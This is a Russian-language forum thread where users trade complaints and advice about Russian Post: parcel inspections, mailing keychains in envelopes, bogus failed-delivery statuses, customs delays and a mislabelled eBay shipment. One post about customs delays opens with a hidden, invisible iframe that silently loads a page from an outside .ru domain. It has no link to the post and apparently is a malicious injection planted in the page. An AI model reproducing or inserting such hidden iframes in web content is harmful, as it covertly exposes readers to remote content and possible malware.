Calipso

Well-known member
Suzume, Сотрудники почты имеют право проверить содержимое вашего отправления. По поводу возмещения упаковки - это не проблема сотрудников почты, вы не должны запаковывать свое отправление до возможной проверки. Это правило всегда было, а во время проведения Олимпиады у нас вообще везде распечатки в ПО висели про проверку. У меня, кстати, никогда не проверяли, но я почему-то всегда про это знала.
 

jumora

НЕ кавайная нека ^^
Suzume, они объяснили) чем конкретно мотивировали- описано у spellbound1213 в его посте, да и в Вашем тоже) честно говоря, Вы по-моему сами себе противоречите)
Suzume сказал(а):
• при возникновении предположения о наличии в почтовом отправлении запрещенных к пересылке предметов или веществ
то есть "ей не понравилось" это именно основание.
А почтовую упаковку никто не повреждал, я же не заклеенную посылку отдаю оператору. А о стоимости пупырки или там обрезков скотча или картона говорить... Ну, я не знаю) Вы бы сами стали?) Самое интересное, что стоимость этого мусора подтвердить невозможно.
Еще уточню, что проверяли у меня отправление всего только один раз, и было это достаточно давно.
 
Последнее редактирование:
Отправил в конверте металлический брелок (по России). Спросил у сотрудницы почты, дойдет ли. Говорит, что да. Но всё равно остались сомнения. Я слышал, что многие посылают брелоки таким образом. Доходят ли они исправно или как повезет? Почему был выбран конверт, а не мини-бандероль: потому что среди конвертов точно не побьется. Бандероль же может сплющить по пути.
 

mikki-malu

Well-known member
CoolGreen,
конверт есть форма упаковки, а бандероль - способ отправки, не путайте :) Вообще повредится или нет, зависит не столько от конверта, сколько от того, как Вы его упаковали. Дойдет Ваш брелок, никуда не денется, в каком виде дойдет - зависит от почтовиков и упаковки :)
 

Evrania

Альтеро-вестник:)
CoolGreen, я все коллективочные брелки и прочую мелочь отправляю только в мультиконвертах. Всегда все доходило исправно и быстро. Но вот один потерялся. Уже 65 дней с момента отправки прошло, заявление на розыск подано, но все равно неприятно.
 

MIMZI

Active member
Не в первый раз наша замечательная почта меня забавляет.
Ладно опечатки с весом (слава богу посылки приходили со всем содержимым без потерь), было, знаем.
Так теперь еще и шуточки с доставкой. Пишут, что посылка пришла в место вручения, но при этом перед этим "прибыло в место вручения" с той же датой и временем стоит операция с названием "неудачная попытка вручения (временное отсутствие адресата)". При этом извещение дай бог кидают в почтовый ящик на следующий день. Вот скажите это вообще нормально, что за фигня собственно (или просто в моем отделении связи такие приколисты)? 0_о
 
Последнее редактирование:
mikki-malu,
брелок был в полиэтилене и завернут в кусок бумаги. Но почему риск побиться в пути такой же? Разве конверты смешивают с какими-то иными видами упаковки в пути? О.о Понятное дело, что могут и бросить конверт, и наступить (нужное подчеркнуть), но по крайней мере его не сплющат другие крупногабаритные коробки. Будет лежать себе среди мягких конвертов. Или я слишком наивен и ещё не всё знаю о логике почты х)
P.s. Спасибо за поправку.
 
Последнее редактирование:

mikki-malu

Well-known member
CoolGreen,
ох, я боюсь, у почты нет логики в нашем понимании, только логистика в понимании почты :) Не волнуйтесь, доедет Ваш брелок в целости, с брелоками, мне кажется, трудно что-то сделать, кроме как потерять. Я все же для надежности предпочитаю пупыркой оборачивать, про мультиконверты с внутренней пупыркой у нас тут не слышали, так что остается свои способы применять, и пупырку, и картон, если надо.
 

Suzume

New member
MIMZI, нормально. С нашей почтой что бы ни происходило - это всегда нормально. :D
Речь именно о посылках или о заказных бандеролях и письмах? Если о последних, то заказные они должны доставлять домой, но ни одной почтальонке не хочется таскать ваши коробки/пакеты/конверты, да ещё если и получателя дома не окажется... Полагаю, они автоматом ставят "не было дома", кидают извещение, и тащись сам.
У меня уже сто лет пробиваются неудачные попытки вручения, хотя у нас всегда кто-то есть дома. Неудачная попытка вручения и тут же извещение в ящике.
 

Lanchia

Active member
Suzume,
у нас ни разу заказные письма и бандероли домой не приносили о_О Всегда извещение в ящик кидают, сам идешь и забираешь, разве что посылку отдают в отдельном окошке, один плюс - там очереди нет.
 

MIMZI

Active member
MIMZI, нормально. С нашей почтой что бы ни происходило - это всегда нормально. :D
Речь именно о посылках или о заказных бандеролях и письмах? Если о последних, то заказные они должны доставлять домой, но ни одной почтальонке не хочется таскать ваши коробки/пакеты/конверты, да ещё если и получателя дома не окажется... Полагаю, они автоматом ставят "не было дома", кидают извещение, и тащись сам.
У меня уже сто лет пробиваются неудачные попытки вручения, хотя у нас всегда кто-то есть дома. Неудачная попытка вручения и тут же извещение в ящике.
Ну тогда ладно. :)))
Просто первый раз такое, вот и поставили в тупик)))
У меня посылка. На днях заберу, если не забыли на почте извещение в ящик кинуть XD.
Хотя уж могли бы в разное время операции поставить, а то как-то странно немного смотрится ))))))
 

Suzume

New member
<font color=008080>Lanchia</font>, у нас носили. Заказные письма - это обязательно. Бандерольки - временами. Если в ней что-нибудь не тяжелее одной книги. Если там книги три, то, конечно, уже нет. Хотя я в то время тоже поудивлялась, когда знакомая сказала, что у них (в областном центре) все бандероли доставляют домой. Хотя и сейчас приносят, видимо, как настроение у почтальонки будет. =) Последние два заказных письма я дома получила.

MIMZI сказал(а):
Хотя уж могли бы в разное время операции поставить, а то как-то странно немного смотрится.
Вот когда на извещении написано "Не было дома", оно воткнуто в дверь, ты с той стороны открываешь, и оно под ноги выпадывает - вот это странно. :D
 
Последнее редактирование:

LiDer

*****
MIMZI,
та же фигня, с декабря или января отметка о невручении в день прихода извещения появляется
 

blackra

New member
<iframe src="http://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>почта похоже опять начала ломаться. одна посылка с экспортом от 26июня получила статус "прибыло на терр.РФ" 30июня, а до таможни на "прием" добралась только 10июля. Потом все круги сортировочного ада по всем(!) инстанциям чего я не видел уже больше полугода и 16 она все же покинула центр логистики. еще неделю будет ко мне ехать. Итого - весь путь до рашки это 4 дня и две недели на хождение по инстанциям +дорога до меня. очень много, как в старые времена.
Вторая посылочка также повторяет мучения первой - экспорт Китай 6 июля, поступило на терр РФ 10-го и 16июля прием на таможню.
Видимо все таджики в отпуска уехали на родину ) работать некому стало
 
Последнее редактирование:

Лайтер

Летописец Анжи
А я наоборот похвалить хотел. -_-

Сало летает (2+ недели в среднем), ЕМС летает (4-5 дней - я в офигении :drag:), по России тоже ракетами шлют - обычная ценная посылка долетает за 5-7 дней. >.>

Чудеса да и только.
 

blackra

New member
Лайтер,
у меня вот это все было ровно до июня, а сейчас как отрезало просто (
 

Nasura

Active member
blackra,
Тоже. Но у меня и с экспортом проблемы были: одна посылка 10 дней до экспорта ползла.
 

Ранриэль

Некомафия
Сказ о блудной посылке или что делать?

Ползла себе посылочка, как обычно ползла. Адрес на ней был правильный, индекс - тоже. Приползла, стоит статус, а извещения всё нет. Сходили на почту, там извещение поискали - нет (нас там знают, поэтому разрешают порыться в коробке с извещеньками). Потом сильно накрыло делами, стало не до посылки. Некоторое время спустя до слоупоков дошло, что что-то тут не так. Индекс. Посылка укатилась не туда. Пошли опять в наше отделение - говорят, что будем ждать засылки, хотя по идее, уже должно было к нам заслаться. История с засылкой уже была, там посыль в итоге прикатила куда надо, так что мы не нервничали. А потом начался отпуск. А посылки всё не было. И потащились мы в 62-ое (там от нас минут 15, к счастью). А там народу - с квартплатой - дофига, так что мы туда вернулись на следующий день. Операторша была чутка тормознутой или просто замучанной, позвала не менее замучанную начальницу, которая мгновенно нашла блудную посыль.

Мораль сей басни такова: если досыла нет, надо идти туда, куда послали. Ибо в некоторых отделениях работников так загоняли, что они просто могут проглядеть посылку.
 

Вложения

Последнее редактирование:

Deirdre

Active member
Еще странных историй :D
Была приобретена на ебее скажем, "диорама". Добротная такая, тяжелая - порядка 4 кг сама по себе. Куплена в США, поэтому привет USPS (вроде как first class package international). Помечена отправленной почти сразу (селлер странный, кажется, все время онлайн, несмотря на разницу во времени) в субботу. В понедельник я спросила, где мой трек, хоть и вроде как ограниченный экспортом, мне его добавили вечером же. Через дней 10 смена трека - и внезапные 27г. Пишу продавцу, все уверены, что ошибка. Расслабились-ждем.
Оно медленно доползает до моего ПО с таким же весом.
Прихожу смотреть - выносят реальное письмо, таможенная декларация CN22 не нашего образца наклеена как в том числе и инфа об отправителе и адресате. В декларации - название диорамы, правильная цена, вес 2 lz.
Кидаю фото продавцу. Он в шоке, я в шоке, все в шоке. (адрес вроде как не его, подпись не его, выглядит по печатям не очень правильно по его словам).
Кто-нибудь сталкивался?
:ai:
 

Nodanoshi

Administrator
Команда форума
Deirdre,
первым классом физически не могли отправить бандуру в 4 кг.
либо PMI либо EMI
 
Сверху